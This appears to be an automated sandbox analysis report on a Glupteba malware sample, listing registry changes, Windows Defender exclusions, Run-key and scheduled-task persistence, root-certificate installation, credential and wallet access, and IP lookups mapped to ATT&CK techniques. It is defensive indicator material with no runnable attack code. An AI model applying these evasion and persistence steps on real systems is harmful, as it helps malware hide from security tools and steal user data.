glupteba | 9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423

System Information Discovery

Processes:

conhost.exeInstall.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	conhost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	conhost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

File.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Control Panel\International\Geo\Nation File.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Control Panel\International\Geo\Nation	File.exe

Loads dropped DLL 64 IoCs

Processes:

9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exeFiles.exeGraphics.exepatch.execsrss.exeFile.exe

pid	process
1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe
1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe
1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe
1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe
1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe
1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe
1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe
1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe
1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe
1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe
1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe
1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe
1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe
1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe
1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe
1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe
1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe
1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe
1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe
1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe
1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe
1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe
1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe
1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe
1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe
1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe
1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe
1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe
1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe
1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe
1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe
1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe
1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe
1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe
1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe
1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe
1808	9ec225728e5bbc2bfc0f36375d4e1ae55e9fd00d6840c1e794ed91ddd7254423.exe
2004	Files.exe
2004	Files.exe
2004	Files.exe
2004	Files.exe
1696	Graphics.exe
1696	Graphics.exe
892
1928	patch.exe
1928	patch.exe
1928	patch.exe
1928	patch.exe
1928	patch.exe
1928	patch.exe
1928	patch.exe
1928	patch.exe
860	csrss.exe
1732	File.exe
860	csrss.exe
1732	File.exe
1732	File.exe
1732	File.exe
1732	File.exe
1732	File.exe
1732	File.exe
1732	File.exe
1732	File.exe
1732	File.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Windows security modification 2 TTPs 10 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

Processes:

Graphics.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\Graphics.exe = "0"	Graphics.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0"	Graphics.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	Graphics.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	Graphics.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\BoldPine = "0"	Graphics.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0"	Graphics.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	Graphics.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	Graphics.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	Graphics.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	Graphics.exe

Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

Processes:

Files.exeGraphics.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.ex"	Files.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Windows\CurrentVersion\Run\BoldPine = "\"C:\\Windows\\rss\\csrss.exe\""	Graphics.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

84 ipinfo.io
235 ipinfo.io
11 ip-api.com
83 ipinfo.io
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
Drops file in System32 directory 1 IoCs

Processes:

Install.exe

description ioc process

File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

zFdDMSbIeAhDTUwR9NKYycuo.exeH7niythF9LYUl22UCCxKqL_Q.exe

pid process

2128 zFdDMSbIeAhDTUwR9NKYycuo.exe
2220 H7niythF9LYUl22UCCxKqL_Q.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

vuojjxkr.exe

description pid process target process

PID 1996 set thread context of 2752 1996 vuojjxkr.exe conhost.exe

flow	ioc
84	ipinfo.io
235	ipinfo.io
11	ip-api.com
83	ipinfo.io

description	ioc	process
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe

pid	process
2128	zFdDMSbIeAhDTUwR9NKYycuo.exe
2220	H7niythF9LYUl22UCCxKqL_Q.exe

description	pid	process	target process
PID 1996 set thread context of 2752	1996	vuojjxkr.exe	conhost.exe

Drops file in Program Files directory 2 IoCs

Processes:

3ttuKG88mjTgiZsD4jXt6kc3.exe

description	ioc	process
File created	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	3ttuKG88mjTgiZsD4jXt6kc3.exe
File opened for modification	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	3ttuKG88mjTgiZsD4jXt6kc3.exe

Drops file in Windows directory 4 IoCs

Processes:

schtasks.exeGraphics.exemakecab.exe

description	ioc	process
File created	C:\Windows\Tasks\booXbIzkEgfNdKvxAC.job	schtasks.exe
File opened for modification	C:\Windows\rss	Graphics.exe
File created	C:\Windows\rss\csrss.exe	Graphics.exe
File created	C:\Windows\Logs\CBS\CbsPersist_20220312041857.cab	makecab.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

Processes:

pub2.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

Processes:

swkptQGCL_6GOXNqiLUpRvXT.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	swkptQGCL_6GOXNqiLUpRvXT.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	swkptQGCL_6GOXNqiLUpRvXT.exe

Creates scheduled task(s) 1 TTPs 7 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

2496 schtasks.exe
2708 schtasks.exe
2524 schtasks.exe
1084 schtasks.exe
1136 schtasks.exe
2576 schtasks.exe
2692 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

2576 timeout.exe
Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exe

pid process

2648 tasklist.exe
2988 tasklist.exe

pid	process
2496	schtasks.exe
2708	schtasks.exe
2524	schtasks.exe
1084	schtasks.exe
1136	schtasks.exe
2576	schtasks.exe
2692	schtasks.exe

pid	process
2576	timeout.exe

pid	process
2648	tasklist.exe
2988	tasklist.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

System Information Discovery

Processes:

Install.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	Install.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	Install.exe

Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

1660 taskkill.exe
2876 taskkill.exe
1616 taskkill.exe

pid	process
1660	taskkill.exe
2876	taskkill.exe
1616	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

Graphics.exenetsh.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-631 = "Tokyo Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-232 = "Hawaiian Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-101 = "Provides RD Gateway enforcement for NAP"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-100 = "EAP Quarantine Enforcement Client"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-21 = "Cape Verde Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-103 = "Microsoft Corporation"	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace\Session	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-103 = "1.0"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-552 = "North Asia Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-103 = "Microsoft Corporation"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-151 = "Central America Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-172 = "Central Standard Time (Mexico)"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-532 = "Sri Lanka Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-741 = "New Zealand Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-982 = "Kamchatka Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time"	Graphics.exe

Modifies system certificate store 2 TTPs 13 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

Processes:

patch.exeswkptQGCL_6GOXNqiLUpRvXT.execsrss.exe

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	patch.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\6252DC40F71143A22FDE9EF7348E064251B18118	swkptQGCL_6GOXNqiLUpRvXT.exe
